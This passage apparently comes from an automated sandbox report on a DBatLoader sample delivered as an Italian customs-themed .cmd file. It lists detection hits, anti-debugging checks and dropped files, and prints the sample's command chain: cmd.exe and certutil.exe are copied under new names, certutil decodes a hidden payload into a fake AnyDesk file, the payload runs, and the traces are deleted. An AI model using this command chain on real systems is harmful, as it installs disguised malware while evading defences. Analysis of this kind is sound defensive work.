0000000B.00000002.1720271096.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
      Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1694923446.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1698590707.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1703554618.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1717188834.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1718131539.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1719120301.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1719455704.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1720271096.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 00000009.00000003.1720468167.0000000002927000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1719853566.000000007FA90000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2941867830.0000000002921000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr

      Data Obfuscation

      barindex
      Yara detected DBatLoader
      Source: Yara matchFile source: 9.2.AnyDesk.PIF.2b60000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: alpha.exe.2.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7894C LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02B7894C
      Source: alpha.exe.2.drStatic PE information: section name: .didat
      Source: kn.exe.4.drStatic PE information: section name: .didat
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E3668 push rsp; ret 6_2_00007FF67C4E3669
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B8D2FC push 02B8D367h; ret 9_2_02B8D35F
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B663B0 push 02B6640Bh; ret 9_2_02B66403
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B663AE push 02B6640Bh; ret 9_2_02B66403
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B6332C push eax; ret 9_2_02B63368
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B8C378 push 02B8C56Eh; ret 9_2_02B8C566
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B6C349 push 8B02B6C1h; ret 9_2_02B6C34E
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B8D0AC push 02B8D125h; ret 9_2_02B8D11D
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7306C push 02B730B9h; ret 9_2_02B730B1
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7306B push 02B730B9h; ret 9_2_02B730B1
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B8D1F8 push 02B8D288h; ret 9_2_02B8D280
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7F108 push ecx; mov dword ptr [esp], edx9_2_02B7F10D
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B8D144 push 02B8D1ECh; ret 9_2_02B8D1E4
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B66784 push 02B667C6h; ret 9_2_02B667BE
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B66782 push 02B667C6h; ret 9_2_02B667BE
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B6D5A0 push 02B6D5CCh; ret 9_2_02B6D5C4
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B8C570 push 02B8C56Eh; ret 9_2_02B8C566
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B6C56C push ecx; mov dword ptr [esp], edx9_2_02B6C571
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7AAE0 push 02B7AB18h; ret 9_2_02B7AB10
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7AADF push 02B7AB18h; ret 9_2_02B7AB10
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B78AD8 push 02B78B10h; ret 9_2_02B78B08
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B6CA4E push 02B6CD72h; ret 9_2_02B6CD6A
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B6CBEC push 02B6CD72h; ret 9_2_02B6CD6A
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7886C push 02B788AEh; ret 9_2_02B788A6
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02BD4850 push eax; ret 9_2_02BD4920
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7790C push 02B77989h; ret 9_2_02B77981
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B76946 push 02B769F3h; ret 9_2_02B769EB
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B76948 push 02B769F3h; ret 9_2_02B769EB
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B75E7C push ecx; mov dword ptr [esp], edx9_2_02B75E7E
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B72F60 push 02B72FD6h; ret 9_2_02B72FCE

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
      Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

      Boot Survival

      barindex
      Drops PE files to the user root directory
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_02B7AB1C
      Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\alpha.exeEvaded block: after key decision
      Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
      Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
      Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
      Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF7E1DD7B4C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF7E1DD7B4C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C535E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF67C535E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5919F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF67C5919F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C591B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF67C591B04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF67C53DBC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C573674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF67C573674
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF67C53B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF67C53D4A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4FD440
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C596F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF67C596F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C593100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF67C593100
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5910C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF67C5910C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF67C52C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF67C59234C
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02B65908
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF7E1DC2978
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7E1DB35B8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF7E1DB1560
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DD7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF7E1DD7B4C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF67C57511C
      Source: AnyDesk.PIF, 00000009.00000002.2940156410.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node

      Anti Debugging

      barindex
      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,9_2_02B7F744
      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DD63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF7E1DD63FC
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B7894C LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02B7894C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF7E1DC8FA4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DC93B0 SetUnhandledExceptionFilter,3_2_00007FF7E1DC93B0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7E1DC8FA4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7E1DC93B0 SetUnhandledExceptionFilter,5_2_00007FF7E1DC93B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C53E0 SetUnhandledExceptionFilter,6_2_00007FF67C5C53E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF67C5C4E18
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF7E1DC8FA4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC93B0 SetUnhandledExceptionFilter,10_2_00007FF7E1DC93B0

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Drops or copies certutil.exe with a different name (likely to bypass HIPS)
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
      Drops or copies cmd.exe with a different name (likely to bypass HIPS)
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C577024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,6_2_00007FF67C577024
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A72B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,6_2_00007FF67C5A72B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C574E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,6_2_00007FF67C574E98
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,3_2_00007FF7E1DC51EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,3_2_00007FF7E1DC3140
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF7E1DC51EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF7E1DC3140
      Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,6_2_00007FF67C5C3800
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02B65ACC
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,9_2_02B6A7C4
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02B65BD8
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,9_2_02B6A810
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF7E1DC51EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF7E1DC3140
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DD86FC _get_osfhandle,GetLocalTime,SetLocalTime,SetLocalTime,GetLastError,GetLastError,3_2_00007FF7E1DD86FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5ABEE8 LookupAccountNameW,GetLastError,GetLastError,#357,LocalAlloc,LocalAlloc,#357,LookupAccountNameW,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF67C5ABEE8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7E1DB586C GetVersion,3_2_00007FF7E1DB586C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,6_2_00007FF67C4F5648
